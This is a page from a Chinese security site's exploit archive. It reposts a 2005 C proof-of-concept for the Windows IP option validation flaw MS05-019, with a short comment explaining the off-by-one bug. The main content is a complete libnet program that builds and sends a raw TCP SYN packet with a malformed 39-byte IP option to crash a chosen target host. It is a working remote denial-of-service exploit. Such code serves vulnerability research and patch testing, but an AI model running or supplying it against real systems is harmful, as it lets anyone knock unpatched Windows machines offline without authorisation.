首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows IP Validation Remote Proof of Concept Exploit (MS05-019)
来源:www.eclipse.org.il 作者:Yuri 发布时间:2005-04-19  

Microsoft Windows IP Validation Remote Proof of Concept Exploit (MS05-019)

/* ecl-winipdos.c - 16/04/05
* Yuri Gushin <yuri@eclipse.org.il>
* Alex Behar <alex@eclipse.org.il>
*
* This one was actually interesting, an off-by-one by our beloved
* M$ :)
*
* When processing an IP packet with an option size (2nd byte after
* the option) of 39, it will crash - since the maximum available
* size is 40 for the whole IP options field, and two are already used:
* [ OPT ] [ SIZE ] [ 38 more bytes ]
* Checks are done to validate that the option-size field is less than
* 40, where a value less than !39! should be checked for validation.
*
* Note that this doesn't affect ALL options, and is also dependant upon
* the underlying protocol.
* Anyways, a small PoC to see how it works and why, tweak test and
* explore, have fun :)
*
*
* Greets fly out to the ECL crew, Valentin Slavov, blexim, stranger,
* manevski, elius, shrink, Evgeny Pinchuk, Ishay Sommer, and anyone else
* who got left out :D
*
*/


#ifndef _BSD_SOURCE
#define _BSD_SOURCE
#endif

#include <stdio.h>
#include <string.h>
#include <time.h>
#include <libnet.h>

#define IP_H 20
#define IPOPTS_MAX 40

void banner();
void usage(char *);

int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
char *device = NULL;

int c;
u_char *buf;
int packet_len = 0;

struct ip *IP;
struct tcphdr *TCP;
u_int32_t src = 0, dst = 0;


banner();
if (argc < 4) usage(argv[0]);

if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) {
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(-1);
}

if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved source address\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved destination address\n");
exit(-1);
}

if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {
perror("malloc");
exit(-1);
}

buf[20] = atoi(argv[3]);
buf[21] = 39; // our malformed size

for (c = 0; c<38; c+=3)
strncpy(&buf[22+c], "ECL", 3); // padding

TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX);
TCP->th_off = 5;

packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2);

srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_TCP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;

TCP->th_sport = htons(1337);
TCP->th_dport = htons(80);
TCP->th_seq = 0;
TCP->th_ack = 0;
TCP->th_x2 = 0;
TCP->th_flags = TH_SYN;
TCP->th_win = rand() & 0xffff;
TCP->th_sum = 0;
TCP->th_urp = 0;

libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2);

if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
exit(-1);
}

printf("Packet sent.\n");

libnet_destroy(l);
free(buf);
return (0);
}

void usage(char *cmd)
{
printf("Usage: %s <source> <destination> <option>\n",cmd);
exit(-1);
}

void banner()
{
printf("\t\tWindows malformed IP Options DoS exploit\n"
"\t\t Yuri Gushin <yuri@eclipse.org.il>\n"
"\t\t Alex Behar <alex@eclipse.org.il>\n"
"\t\t\t ECL Team\n\n\n");
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Suite and Firefox favi
·Serendipity exit.php SQL Injec
·Mozilla Firefox Sidebar Code E
·Explorer.exe WMF Parsing DoS
·Sendmail <= 8.12.9 remote e
·sphpblog多个输入验证漏洞
·Sumus v0.2.2 httpd Component R
·PostgreSQL 8.x PL/PgSQL Remote
·Multiple Debuggers Security By
·PMSoftware Simple Web Server R
·Salim Gasmi GLD Postfix Greyli
·Microsoft Exchange Server Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved